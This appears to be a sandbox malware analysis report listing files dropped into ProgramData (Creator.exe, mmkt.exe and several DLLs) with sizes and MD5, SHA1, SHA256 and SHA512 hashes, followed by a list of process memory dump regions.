df38f876bce494d9f3fe5cdc423d8254

SHA1
946b8b08297040a7cb4f9ef62fdde89d1dc7c13f

SHA256
f3c6e8e6692f1ef87728975236a2e01f4259ee5ad80abdfa9bdcfd316f9f481e

SHA512
34749d8451cfa6b31c00e9a2b732cb752affd13f09ea408b53a9d298c3a69f7c53c6da545b096f796ee8913636c7d23e8726c72d62258f21f947b9f5a297c9b4

Download Submit
\ProgramData\Creator.exe

Filesize
83KB

MD5
67f09402425b0be36f0556c303d6c407

SHA1
ff31d635aab85a2d8bad7e5c8db2fa432bc7f6f1

SHA256
31bf8f79ee6fb5a659ae6f63da0389e98c53d1cb53f85d6bb916647a6d764e48

SHA512
0ed654bb76b550941b0575b8d0b3de1c376321f1bfc40e4f83987adf1522f4cc20c82e288ba9076fe1c85ac0aaa76b2d71e9d49493df89b593384090c4965310

Download Submit
\ProgramData\coli-0.dll

Filesize
15KB

MD5
3c2fe2dbdf09cfa869344fdb53307cb2

SHA1
b67a8475e6076a24066b7cb6b36d307244bb741f

SHA256
0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887

SHA512
d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c

Download Submit
\ProgramData\exma-1.dll

Filesize
10KB

MD5
ba629216db6cf7c0c720054b0c9a13f3

SHA1
37bb800b2bb812d4430e2510f14b5b717099abaa

SHA256
15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9

SHA512
c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9

Download Submit
\ProgramData\libxml2.dll

Filesize
807KB

MD5
9a5cec05e9c158cbc51cdc972693363d

SHA1
ca4d1bb44c64a85871944f3913ca6ccddfa2dc04

SHA256
aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3

SHA512
8af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94

Download Submit
\ProgramData\mmkt.exe

Filesize
982KB

MD5
44da7cc6c18108a0a9eb5a8cfb985faa

SHA1
3e0c81e1646cc61bf9a7774aa8f71f83aeb08eea

SHA256
94982535040245873ff776ee3a431037c018f4c0ed586c8399c017a96703e6a3

SHA512
a4fce1a3df1d7d20ac3531da45199ad2767ecdc1bf5ef8477b6ea8429b83e07dd30c9c6f2cf08955951a6971b30ad3c2c2a65e9879f0a9914fbcfbbb0ebdb107

Download Submit
\ProgramData\posh-0.dll

Filesize
11KB

MD5
2f0a52ce4f445c6e656ecebbcaceade5

SHA1
35493e06b0b2cdab2211c0fc02286f45d5e2606d

SHA256
cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb

SHA512
88151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1

Download Submit
\ProgramData\tibe-2.dll

Filesize
232KB

MD5
f0881d5a7f75389deba3eff3f4df09ac

SHA1
8404f2776fa8f7f8eaffb7a1859c19b0817b147a

SHA256
ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362

SHA512
f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e

Download Submit
\ProgramData\trch-1.dll

Filesize
58KB

MD5
838ceb02081ac27de43da56bec20fc76

SHA1
972ab587cdb63c8263eb977f10977fd7d27ecf7b

SHA256
0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f

SHA512
bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22

Download Submit
\ProgramData\trfo-2.dll

Filesize
29KB

MD5
3e89c56056e5525bf4d9e52b28fbbca7

SHA1
08f93ab25190a44c4e29bee5e8aacecc90dab80c

SHA256
b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa

SHA512
32487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6

Download Submit
\ProgramData\tucl-1.dll

Filesize
9KB

MD5
83076104ae977d850d1e015704e5730a

SHA1
776e7079734bc4817e3af0049f42524404a55310

SHA256
cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12

SHA512
bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8

Download Submit
\ProgramData\ucl.dll

Filesize
57KB

MD5
6b7276e4aa7a1e50735d2f6923b40de4

SHA1
db8603ac6cac7eb3690f67af7b8d081aa9ce3075

SHA256
f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a

SHA512
58e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa

Download Submit
memory/1032-942-0x0000000002DB0000-0x0000000002E35000-memory.dmp

Filesize
532KB

Download
memory/1032-2358-0x0000000002DB0000-0x0000000002E35000-memory.dmp

Filesize
532KB

Download
memory/1032-38-0x0000000000400000-0x0000000000A86000-memory.dmp

Filesize
6.5MB

Download
memory/1524-933-0x000000003F910000-0x000000003FA27000-memory.dmp

Filesize
1.1MB

Download
memory/1524-36-0x000000003F910000-0x000000003FA27000-memory.dmp

Filesize
1.1MB

Download
memory/1928-945-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/1928-2361-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2176-602-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-640-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-610-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-606-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-637-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-626-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-614-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-604-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-601-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-616-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-618-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-620-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-622-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-624-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-628-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-630-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-632-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-634-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-638-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-612-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-642-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-644-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-649-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-651-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-653-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-657-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-659-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-661-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-663-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-646-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-656-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-665-0x00000000021B0000-0x00000000021DB000-memory.dmp

Filesize
172KB

Download
memory/2176-522-0x0000000001E40000-0x0000000001E72000-memory.dmp

Filesize
200KB

Download
memory/2176-542-0x00000000021B0000-0x00000000021E2000-memory.dmp

Filesize
200KB

Download
memory/2720-14-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2720-15-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/3060-32-0x0000000000400000-0x000000000058A000-memory.dmp

Filesize
1.5MB

Download
memory/3060-33-0x0000000000400000-0x000000000058A000-memory.dmp

Filesize
1.5MB

Download
memory/3060-39-0x0000000000400000-0x000000000058A000-memory.dmp

Filesize
1.5MB

Download